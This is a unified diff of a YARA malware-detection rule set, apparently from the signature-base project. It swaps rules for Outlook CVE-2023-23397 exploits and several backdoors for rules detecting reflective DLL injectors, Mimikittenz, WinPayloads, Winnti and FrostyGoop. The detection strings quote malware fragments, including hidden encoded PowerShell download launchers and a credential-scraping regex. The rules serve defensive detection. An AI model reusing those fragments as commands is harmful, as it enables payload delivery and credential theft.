-		logic_hash = "0bdf3bf5130c51c1355f179704933ca473a702595c580642035c8d3b9aad5725"
+		logic_hash = "1904b152c42126abd87671747dc2733e2a5e2a01ab55346c131fb430fe5ba58e"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "4bcedac20a75e8f8833f4725adfc87577c32990c3783bf6c743f14599a176c37"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d594f60e766e0c3261a599b385e3f686b159a992d19fa624fad8761776efa4f0"
 
 	strings:
-		$x1 = "tomcat_memShell" ascii
-		$x2 = "versa/vnms/ui/config/" ascii fullword
+		$x1 = " -p <TARGET PROCESS NAME> | -u <DLL PAYLOAD> [--obfuscate]" fullword wide
+		$x2 = "You've selected to inject into process: %s" fullword wide
+		$x3 = "Lynx DLL Injector" fullword wide
+		$x4 = "Reflective DLL Injector" fullword wide
+		$x5 = "Failed write payload: %lu" fullword wide
+		$x6 = "Failed to start payload: %lu" fullword wide
+		$x7 = "Injecting payload..." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 3000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_SUSP_EXPL_Msg_CVE_2023_23397_Mar23 : CVE_2023_23397 FILE
+
+rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_2 : FILE
 {
 	meta:
-		description = "MSG file with a PidLidReminderFileParameter property, potentially exploiting CVE-2023-23397"
-		author = "delivr.to, modified by Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
-		id = "0a4d7bbe-1e17-5240-ad0f-29511752b267"
-		date = "2023-03-15"
-		modified = "2024-12-03"
-		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_outlook_cve_2023_23397.yar#L1-L39"
+		description = "Detects Reflective DLL Loader - suspicious - Possible FP could be program crack"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5948d9ba-e655-5b11-ad74-f650b3a753e7"
+		date = "2017-08-20"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L102-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
-		hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
-		hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
-		hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
-		hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
-		logic_hash = "fbbbaf5cd858078adddc80b9c9c56cb448613da28206a91778d22cd1cf64655e"
+		logic_hash = "f01b2cf754c3527d0d7fd44c28d3cdb9327762572b43a7d6f7667e5c2a26ab17"
 		score = 60
 		quality = 85
-		tags = "CVE-2023-23397, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c2a7a2d0b05ad42386a2bedb780205b7c0af76fe9ee3d47bbe217562f627fcae"
+		hash2 = "b90831aaf8859e604283e5292158f08f100d4a2d4e1875ea1911750a6cb85fe0"
 
 	strings:
-		$psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
-		$psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
-		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$rfp = { 1F 85 00 00 }
-		$u1 = { 00 00 5C 00 5C 00 }
-		$fp_msi1 = {84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46}
-		$fp_asd = "theme/theme1.xml"
+		$x1 = "\\ReflectiveDLLInjection-master\\" ascii
+		$s2 = "reflective_dll.dll" fullword ascii
+		$s3 = "DLL injection" fullword ascii
+		$s4 = "_ReflectiveLoader@4" ascii
+		$s5 = "Reflective Dll Injection" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0xD0CF11E0 and uint32be( 4 ) == 0xA1B11AE1 and 1 of ( $psetid* ) and $rfp and $u1 and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "59867122bcc8c959ad307ac2dd08af79" or pe.exports ( "_ReflectiveLoader@4" ) or 2 of them ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 : CVE_2023_23397 FILE
+
+rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_3 : FILE
 {
 	meta:
-		description = "Detects suspicious .msg file with a PidLidReminderFileParameter property exploiting CVE-2023-23397 (modified delivr.to rule - more specific = less FPs but limited to exfil using IP addresses, not FQDNs)"
-		author = "delivr.to, Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
-		id = "d85bf1d9-aebe-5f8c-9dd4-c509f64e221a"
-		date = "2023-03-15"
-		modified = "2023-03-18"
-		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_outlook_cve_2023_23397.yar#L41-L81"
+		description = "Detects Reflective DLL Loader"
+		author = "Florian Roth (Nextron Systems)"
+		id = "91842f58-5205-533d-9e97-a1e84fbf259d"
+		date = "2017-08-20"
+		modified = "2022-12-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L130-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
-		hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
-		hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
-		hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
-		hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
-		hash = "e7a1391dd53f349094c1235760ed0642519fd87baf740839817d47488b9aef02"
-		logic_hash = "a8e8326f5aaa29b449f9203623e03d3d3a1d176bb764171d860afc510a1732e6"
+		logic_hash = "4fbba94e6d3dc7b4976c90c0f95683c548f3c444bf5eaf0a7c55d96150978a67"
 		score = 75
 		quality = 85
-		tags = "CVE-2023-23397, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d10e4b3f1d00f4da391ac03872204dc6551d867684e0af2a4ef52055e771f474"
 
 	strings:
-		$psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
-		$psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
-		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$rfp = { 1F 85 00 00 }
-		$u1 = { 5C 00 5C 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 3? 00 3? 00|3? 00 3? 00|3? 00) }
-		$u2 = { 00 5C 5C (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 3? 3?|3? 3?|3?) }
-		$fp_msi1 = {84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46}
+		$s1 = "\\Release\\inject.pdb" ascii
+		$s2 = "!!! Failed to gather information on system processes! " fullword ascii
+		$s3 = "reflective_dll.dll" fullword ascii
+		$s4 = "[-] %s. Error=%d" fullword ascii
+		$s5 = "\\Start Menu\\Programs\\reflective_dll.dll" ascii
 
 	condition:
-		( uint16( 0 ) == 0xCFD0 and 1 of ( $psetid* ) or uint32be( 0 ) == 0x789F3E22 ) and any of ( $u* ) and $rfp and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "26ba48d3e3b964f75ff148b6679b42ec" or 2 of them ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_EXPL_SUSP_Outlook_CVE_2023_23397_SMTP_Mail_Mar23 : CVE_2023_23397
+rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_4 : FILE
 {
 	meta:
-		description = "Detects suspicious *.eml files that include TNEF content that possibly exploits CVE-2023-23397. Lower score than EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 as we're only looking for UNC prefix."
-		author = "Nils Kuhnert"
-		id = "922fae73-520d-5659-8331-f242c7c55810"
-		date = "2023-03-17"
-		modified = "2023-03-24"
-		reference = "https://twitter.com/wdormann/status/1636491612686622723"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_outlook_cve_2023_23397.yar#L83-L112"
+		description = "Detects Reflective DLL Loader"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d2a28ea6-a3f7-5ceb-86fd-1e5b7f916a41"
+		date = "2017-08-20"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L156-L176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a361eb3abf98655f43efff2a5399f112d9ac2d23df85a642ab744c78e98330e0"
-		score = 60
+		logic_hash = "b988ea586589dced18f2165eff431be897b3e96fce2d124f5f41d52b520ccd76"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-23397"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "205b881701d3026d7e296570533e5380e7aaccaa343d71b6fcc60802528bdb74"
+		hash2 = "f76151646a0b94024761812cde1097ae2c6d455c28356a3db1f7905d3d9d6718"
 
 	strings:
-		$mail1 = { 0A 46 72 6F 6D 3A 20 }
-		$mail2 = { 0A 54 6F 3A }
-		$mail3 = { 0A 52 65 63 65 69 76 65 64 3A }
-		$tnef1 = "Content-Type: application/ms-tnef" ascii
-		$tnef2 = "\x78\x9f\x3e\x22" base64
-		$ipm1 = "IPM.Task" base64
-		$ipm2 = "IPM.Appointment" base64
-		$unc = "\x00\x00\x00\x5c\x5c" base64
+		$x1 = "<H1>&nbsp;>> >> >> Keylogger Installed - %s %s << << <<</H1>" fullword ascii
+		$s1 = "<H3> ----- Running Process ----- </H3>" fullword ascii
+		$s2 = "<H2>Operating system: %s<H2>" fullword ascii
+		$s3 = "<H2>System32 dir:  %s</H2>" fullword ascii
 
 	condition:
-		all of ( $mail* ) and all of ( $tnef* ) and 1 of ( $ipm* ) and $unc
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
 }
-rule SIGNATURE_BASE_Pirpi_1609_A : FILE
+rule SIGNATURE_BASE_Invoke_Mimikittenz : FILE
 {
 	meta:
-		description = "Detects Pirpi Backdoor - and other malware (generic rule)"
+		description = "Detects Mimikittenz - file Invoke-mimikittenz.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "72b996e2-56cf-5a8d-8d8b-97eda7105d26"
-		date = "2016-09-08"
+		id = "6dcf3d0a-302b-520c-97c6-fd843c8a25b9"
+		date = "2016-07-19"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_pirpi.yar#L10-L43"
+		reference = "https://github.com/putterpanda/mimikittenz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikittenz.yar#L10-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "470745d0dd44c161ed6ec474f85531a3aca8ebb0adb98b902cb0b7465ca07d8b"
-		score = 75
+		logic_hash = "f0410a0290d09d3574854b55ffe578f6f799368e14677b581cd65d18700a8656"
+		score = 90
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a5a0bc350e774bd784fc25090518626b65a3ce10c7401f44a1616ea2ae32f4c"
-		hash2 = "8caa179ec20b6e3938d17132980e0b9fe8ef753a70052f7e857b339427eb0f78"
+		hash1 = "14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a"
 
 	strings:
-		$x1 = "expand.exe1.gif" fullword ascii
-		$c1 = "expand.exe" fullword ascii
-		$c2 = "ctf.exe" fullword ascii
-		$s1 = "flvUpdate.exe" fullword wide
-		$s2 = "www.ThinkWorking.com" fullword wide
-		$s3 = "ctfnon.exe" fullword ascii
-		$s4 = "flv%d.exe" fullword ascii
-		$s5 = "HARDWARE\\DESCRIPTION\\System\\BIOS" fullword ascii
-		$s6 = "12811[%d].gif" fullword ascii
-		$s7 = "GetApp03" fullword wide
-		$s8 = "flvUpdate" fullword wide
-		$s9 = "%d-%4.4d%d" fullword ascii
-		$s10 = "http://%s/%5.5d.html" fullword ascii
-		$s11 = "flvbho.exe" fullword wide
-		$op1 = { 74 08 c1 cb 0d 03 da 40 eb }
-		$op2 = { 03 f5 56 8b 76 20 03 f5 33 c9 49 }
-		$op3 = { 03 dd 66 8b 0c 4b 8b 5e 1c 03 dd 8b 04 8b 03 c5 }
+		$x1 = "[mimikittenz.MemProcInspector]" ascii
+		$s1 = "PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |" fullword ascii
+		$s2 = "IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);" fullword ascii
+		$s3 = "&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=" ascii
+		$s4 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( $x1 or all of ( $c* ) or all of ( $op* ) ) ) or ( 8 of them )
+		( uint16( 0 ) == 0x7566 and filesize < 60KB and 2 of them ) or $x1
 }
-rule SIGNATURE_BASE_Pirpi_1609_B : FILE
+rule SIGNATURE_BASE_Winpayloads_Powershell : FILE
 {
 	meta:
-		description = "Detects Pirpi Backdoor"
+		description = "Detects WinPayloads PowerShell Payload"
 		author = "Florian Roth (Nextron Systems)"
-		id = "caf63b97-efd7-5cd4-8954-b86db4d93cf5"
-		date = "2016-09-08"
+		id = "8b6b8823-4656-5b0d-9a1e-84045287f5bf"
+		date = "2017-07-11"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_pirpi.yar#L45-L65"
+		reference = "https://github.com/nccgroup/Winpayloads"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winpayloads.yar#L12-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4dafff80fb7bfcffccf96d991245c13b3208fd4f5a21488d7d6885758ef05078"
+		logic_hash = "e9e75f7190327f08c5e204977c6714c93951a6db0ddf000c8b37db37131b9def"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "498b98c02e19f4b03dc6a3a8b6ff8761ef2c0fedda846ced4b6f1c87b52468e7"
+		hash1 = "011eba8f18b66634f6eb47527b4ceddac2ae615d6861f89a35dbb9fc591cae8e"
 
 	strings:
-		$s1 = "tconn <ip> <port> //set temp connect value, and disconnect." fullword ascii
-		$s2 = "E* ListenCheckSsl SslRecv fd(%d) Error ret:%d %d" fullword ascii
-		$s3 = "%s %s L* ListenCheckSsl fd(%d) SslV(-%d-)" fullword ascii
-		$s4 = "S:%d.%d-%d.%d V(%d.%d) Listen On %d Ok." fullword ascii
-		$s5 = "E* ListenCheckSsl fd(%d) SslAccept Err %d" fullword ascii
-		$s6 = "%s-%s N110 Ssl Connect Ok(%s:%d)." fullword ascii
-		$s7 = "%s-%s N110 Basic Connect Ok(%s:%d)." fullword ascii
-		$s8 = "tconn <ip> <port>" fullword ascii
+		$x1 = "$Base64Cert = 'MIIJeQIBAzCCCT8GCSqGSIb3DQEHAaCCCTAEggksMIIJKDCCA98GCSqGSIb3DQEHBqCCA9AwggPMAgEAMIIDxQYJKoZIhvcNAQcBMBwGCiqGSIb3D" ascii
+		$x2 = "powershell -w hidden -noni -enc SQBF" fullword ascii nocase
+		$x3 = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwA" ascii
+		$x4 = "powershell.exe -WindowStyle Hidden -enc JABjAGwAaQBlAG4AdAA" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 4 of them )
+		filesize < 10KB and 1 of them
 }
-rule SIGNATURE_BASE_Kriskynote_Mar17_1 : FILE
+rule SIGNATURE_BASE_Winpayloads_Payload : FILE
 {
 	meta:
-		description = "Detects Kriskynote Malware"
+		description = "Detects WinPayloads Payload"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1e5df0c-0112-5fee-85e9-cb0ca31f5234"
-		date = "2017-03-03"
+		id = "44fae324-1fc8-5417-950a-8a3783b6d2ae"
+		date = "2017-07-11"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kriskynote.yar#L11-L30"
+		reference = "https://github.com/nccgroup/Winpayloads"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winpayloads.yar#L30-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cc4861f3a612cbaba6abf8ded76972941c879f04b59c29756bf0ba8083bf93ab"
+		logic_hash = "8a22eeafa320bcf0d41de402223d3ad51d8625ffaa68fe24be864ffcf72a64a2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a19c4b615aa54207604b181873e614d84126b639fee2cce3ca9d5bd863f6f577"
-		hash2 = "62b41db0bf63fa45a2c2b0f5df8c2209a5d96bf2bddf82749595c66d30b7ec61"
+		super_rule = 1
+		hash1 = "23a24f99c3c6c00cd4bf6cb968f813ba2ceadfa846c7f169f412bcbb71ba6573"
+		hash2 = "35069905d9b7ba1fd57c8df03614f563504194e4684f47aafa08ebb8d9409d0b"
+		hash3 = "a28d107f168d85c38fc76229b14561b472e60e60973eb10b6b554c1f57469322"
+		hash4 = "ed93e28ca18f749a78678b1e8e8ac31f4c6c0bab2376d398b413dbdfd5af9c7f"
+		hash5 = "26f5aee1ce65158e8375deb63c27edabfc9f5de3c1c88a4ce26a7e50b315b6d8"
+		hash6 = "b25a515706085dbde0b98deaf647ef9a8700604652c60c6b706a2ff83fdcbf45"
 
 	strings:
-		$s1 = "gzwrite64" fullword ascii
-		$opa1 = { e8 6b fd ff ff 83 f8 ff 74 65 83 7b 28 00 74 42 }
-		$opb1 = { 8a 04 08 8b 8e a4 16 00 00 88 44 24 0c 66 c7 04 }
-		$opb2 = { 89 4e 6c 89 46 74 e9 ad fc ff ff 8b 46 68 85 c0 }
+		$s1 = "bpayload.exe.manifest" fullword ascii
+		$s2 = "spayload" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and $s1 and ( $opa1 or all of ( $opb* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 10000KB and all of them )
 }
-rule SIGNATURE_BASE_Kriskynote_Mar17_2 : FILE
+rule SIGNATURE_BASE_Winnti_Fonfig : FILE
 {
 	meta:
-		description = "Detects Kriskynote Malware"
+		description = "Winnti sample - file fonfig.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "704baf41-9718-537f-9456-381a9f42fb97"
-		date = "2017-03-03"
+		id = "ca3c186c-0286-5b9b-9585-7680336c8c3d"
+		date = "2017-01-25"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kriskynote.yar#L32-L46"
+		reference = "https://goo.gl/VbvJtL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_ms_report_201701.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4a1a7c1c75cc64df32d2f055538c5ad15418802733046471520c372a616f1e11"
+		logic_hash = "715892268431bf76cf9bf0bdbeaf4129befdc590b5b2dcae479d95dfe77561a4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cb9a2f77868b28d98e4f9c1b27b7242fec2f2abbc91bfc21fe0573e472c5dfcb"
+		hash1 = "2c9882854a60c624ecf6b62b6c7cc7ed04cf4a29814aa5ed1f1a336854697641"
 
 	strings:
-		$s1 = "fgjfcn8456fgjhfg89653wetwts" fullword ascii
-		$op0 = { 33 c0 80 34 30 03 40 3d e6 21 00 00 72 f4 b8 e6 }
+		$s1 = "mciqtz.exe" fullword wide
+		$s2 = "knat9y7m" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_Kriskynote_Mar17_3 : FILE
+rule SIGNATURE_BASE_Winnti_Nlaifsvc : FILE
 {
 	meta:
-		description = "Detects Kriskynote Malware"
+		description = "Winnti sample - file NlaifSvc.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "647fac4c-2326-5a68-9890-8236022c1548"
-		date = "2017-03-03"
+		id = "d2bfcad4-9762-5f2a-88cc-e8cdc648e710"
+		date = "2017-01-25"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kriskynote.yar#L48-L64"
+		reference = "https://goo.gl/VbvJtL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_ms_report_201701.yar#L26-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fda8a7944cdd12cadb1c902664909a8164835f660e6fa56209bc51164a90e77c"
+		logic_hash = "7268c79baf37174e04b391ae42cdd6014f17478c5b89d0c7b8042eb839324f87"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc838e07834994f25b3b271611e1014b3593278f0703a4a985fb4234936df492"
+		hash1 = "964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5"
 
 	strings:
-		$s1 = "rundll32 %s Check" fullword ascii
-		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs" fullword ascii
-		$s3 = "name=\"IsUserAdmin\"" fullword ascii
-		$s4 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+		$x1 = "cracked by ximo" ascii
+		$s1 = "Yqrfpk" fullword ascii
+		$s2 = "IVVTOC" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_PLEAD_Downloader_Jun18_1 : FILE
+rule SIGNATURE_BASE_MAL_Go_Modbus_Jul24_1 : FILE
 {
 	meta:
-		description = "Detects PLEAD Downloader"
-		author = "Florian Roth (Nextron Systems)"
-		id = "19d588d8-1f03-5f34-b82e-b645c28a19a4"
-		date = "2018-06-16"
-		modified = "2023-12-05"
-		reference = "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_plead_downloader.yar#L1-L21"
+		description = "Detects characteristics reported by Dragos for FrostyGoop ICS malware"
+		author = "Florian Roth"
+		id = "4a1e6bbe-d743-5394-b207-e417b64fa76d"
+		date = "2024-07-23"
+		modified = "2024-07-24"
+		reference = "https://hub.dragos.com/hubfs/Reports/Dragos-FrostyGoop-ICS-Malware-Intel-Brief-0724_.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_go_modbus.yar#L2-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "82fa4629aeb67a657af8b40527414e59d1c45a7c4e3c68398d3472c080c9487b"
+		logic_hash = "d992c8159deca0ed2b2a33da3c31fdf0efa9a09ba941d059fa7fc1bad458aed1"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a26df4f62ada084a596bf0f603691bc9c02024be98abec4a9872f0ff0085f940"
+		hash1 = "5d2e4fd08f81e3b2eb2f3eaae16eb32ae02e760afc36fa17f4649322f6da53fb"
 
 	strings:
-		$s1 = "%02d:%02d:%02d" ascii fullword
-		$s2 = "%02d-%02d-%02d" ascii fullword
-		$s3 = "1111%02d%02d%02d_%02d%02d2222" ascii fullword
-		$a1 = "Scanning..." wide fullword
-		$a2 = "Checking..." wide fullword
+		$a1 = "Go build"
+		$sa1 = "github.com/rolfl/modbus"
+		$sb1 = "main.TaskList.executeCommand"
+		$sb2 = "main.TargetList.getTargetIpList"
+		$sb3 = "main.TaskList.getTaskIpList"
+		$sb4 = "main.CycleInfo" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) or ( 2 of ( $s* ) and 1 of ( $a* ) ) )
+		filesize < 30MB and ( $sa1 and 3 of ( $sb* ) ) or 4 of them
 }
-
-rule SIGNATURE_BASE_APT_MAL_Revil_Kaseya_Jul21_1 : FILE
+rule SIGNATURE_BASE_MAL_Backdoor_SPAREPART_Sleepgenerator
 {
 	meta:
-		description = "Detects malware used in the Kaseya supply chain attack"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7356f4ea-183f-52ec-a167-fc16b8bfb55a"
-		date = "2021-07-02"
+		description = "Detects the algorithm used to determine the next sleep timer"
+		author = "Mandiant"
+		id = "b9cd46e4-0e06-5ead-8379-adcfc3c384d0"
+		date = "2022-12-14"
 		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_revil_general.yar#L3-L30"
+		reference = "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ru_sparepart_dec22.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a7f9fa8f8e8a3a25728aa6a334924e0b4075f3422df6b92a2f544bb0ebb6bfad"
-		score = 75
+		hash = "f9cd5b145e372553dded92628db038d8"
+		logic_hash = "41a9fdb2ba7aefcaf6ef2477b598e98b9045ef17ce9bfe46f3169d0b2e0dd289"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		hash1 = "1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e"
-		hash2 = "aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7"
-		hash3 = "dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f"
